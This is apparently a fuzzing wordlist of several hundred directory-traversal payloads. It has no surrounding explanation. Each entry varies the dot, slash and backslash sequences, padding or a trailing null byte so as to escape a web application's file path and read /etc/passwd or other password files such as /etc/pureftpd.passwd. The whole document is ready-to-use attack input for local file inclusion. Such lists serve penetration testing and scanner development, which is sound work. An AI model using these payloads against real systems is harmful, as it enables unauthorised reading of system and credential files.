/etc/passwd
/etc/npasswd
/etc/passwd
/etc/pureftpd.passwd
..//etc/passwd
../..//etc/passwd
../../..//etc/passwd
../../../..//etc/passwd
../../../../..//etc/passwd
../../../../../..//etc/passwd
../../../../../../..//etc/passwd
../../../../../../../..//etc/passwd
..\/etc/passwd
..\..\/etc/passwd
..\..\..\/etc/passwd
..\..\..\..\/etc/passwd
..\..\..\..\..\/etc/passwd
..\..\..\..\..\..\/etc/passwd
..\..\..\..\..\..\..\/etc/passwd
..\..\..\..\..\..\..\..\/etc/passwd
\..//etc/passwd
\../\..//etc/passwd
\../\../\..//etc/passwd
\../\../\../\..//etc/passwd
\../\../\../\../\..//etc/passwd
\../\../\../\../\../\..//etc/passwd
\../\../\../\../\../\../\..//etc/passwd
\../\../\../\../\../\../\../\..//etc/passwd
/..\/etc/passwd
/..\/..\/etc/passwd
/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd
...//etc/passwd
.../...//etc/passwd
.../.../...//etc/passwd
.../.../.../...//etc/passwd
.../.../.../.../...//etc/passwd
.../.../.../.../.../...//etc/passwd
.../.../.../.../.../.../...//etc/passwd
.../.../.../.../.../.../.../...//etc/passwd
...\/etc/passwd
...\...\/etc/passwd
...\...\...\/etc/passwd
...\...\...\...\/etc/passwd
...\...\...\...\...\/etc/passwd
...\...\...\...\...\...\/etc/passwd
...\...\...\...\...\...\...\/etc/passwd
...\...\...\...\...\...\...\...\/etc/passwd
....//etc/passwd
..../....//etc/passwd
..../..../....//etc/passwd
..../..../..../....//etc/passwd
..../..../..../..../....//etc/passwd
..../..../..../..../..../....//etc/passwd
..../..../..../..../..../..../....//etc/passwd
..../..../..../..../..../..../..../....//etc/passwd
....\/etc/passwd
....\....\/etc/passwd
....\....\....\/etc/passwd
....\....\....\....\/etc/passwd
....\....\....\....\....\/etc/passwd
....\....\....\....\....\....\/etc/passwd
....\....\....\....\....\....\....\/etc/passwd
....\....\....\....\....\....\....\....\/etc/passwd
..........................................................................//etc/passwd
........................................................................../..//etc/passwd
........................................................................../../..//etc/passwd
........................................................................../../../..//etc/passwd
........................................................................../../../../..//etc/passwd
........................................................................../../../../../..//etc/passwd
........................................................................../../../../../../..//etc/passwd
........................................................................../../../../../../../..//etc/passwd
..........................................................................\/etc/passwd
..........................................................................\..\/etc/passwd
..........................................................................\..\..\/etc/passwd
..........................................................................\..\..\..\/etc/passwd
..........................................................................\..\..\..\..\/etc/passwd
..........................................................................\..\..\..\..\..\/etc/passwd
..........................................................................\..\..\..\..\..\..\/etc/passwd
..........................................................................\..\..\..\..\..\..\..\/etc/passwd
.///etc/passwd
..//..///etc/passwd
..//..//..///etc/passwd
..//..//..//..///etc/passwd
..//..//..//..//..///etc/passwd
..//..//..//..//..//..///etc/passwd
..//..//..//..//..//..//..///etc/passwd
..//..//..//..//..//..//..//..///etc/passwd
..////etc/passwd
..///..////etc/passwd
..///..///..////etc/passwd
..///..///..///..////etc/passwd
..///..///..///..///..////etc/passwd
..///..///..///..///..///..////etc/passwd
..///..///..///..///..///..///..////etc/passwd
..///..///..///..///..///..///..///..////etc/passwd
..\\/etc/passwd
..\\..\\/etc/passwd
..\\..\\..\\/etc/passwd
..\\..\\..\\..\\/etc/passwd
..\\..\\..\\..\\..\\/etc/passwd
..\\..\\..\\..\\..\\..\\/etc/passwd
..\\..\\..\\..\\..\\..\\..\\/etc/passwd
..\\..\\..\\..\\..\\..\\..\\..\\/etc/passwd
..\\\/etc/passwd
..\\\..\\\/etc/passwd
..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd
./\/.//etc/passwd
./\/././\/.//etc/passwd
./\/././\/././\/.//etc/passwd
./\/././\/././\/././\/.//etc/passwd
./\/././\/././\/././\/././\/.//etc/passwd
./\/././\/././\/././\/././\/././\/.//etc/passwd
./\/././\/././\/././\/././\/././\/././\/.//etc/passwd
./\/././\/././\/././\/././\/././\/././\/././\/.//etc/passwd
....//....//....//....//....//....//....//....//....//etc/passwd
.\/\.\/etc/passwd
.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../..//etc/passwd
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../..//etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\/etc/passwd
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\/etc/passwd
./..//etc/passwd
./.././..//etc/passwd
./.././.././..//etc/passwd
./.././.././.././..//etc/passwd
./.././.././.././.././..//etc/passwd
./.././.././.././.././.././..//etc/passwd
./.././.././.././.././.././.././..//etc/passwd
./.././.././.././.././.././.././.././..//etc/passwd
.\..\/etc/passwd
.\..\.\..\/etc/passwd
.\..\.\..\.\..\/etc/passwd
.\..\.\..\.\..\.\..\/etc/passwd
.\..\.\..\.\..\.\..\.\..\/etc/passwd
.\..\.\..\.\..\.\..\.\..\.\..\/etc/passwd
.\..\.\..\.\..\.\..\.\..\.\..\.\..\/etc/passwd
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\/etc/passwd
.//..///etc/passwd
.//..//.//..///etc/passwd
.//..//.//..//.//..///etc/passwd
.//..//.//..//.//..//.//..///etc/passwd
.//..//.//..//.//..//.//..//.//..///etc/passwd
.//..//.//..//.//..//.//..//.//..//.//..///etc/passwd
.//..//.//..//.//..//.//..//.//..//.//..//.//..///etc/passwd
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..///etc/passwd
.\\..\\/etc/passwd
.\\..\\.\\..\\/etc/passwd
.\\..\\.\\..\\.\\..\\/etc/passwd
.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/passwd
/./././././././././././etc/passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd
/..\../..\../..\../..\../..\../..\../etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
/etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd
etc/passwd
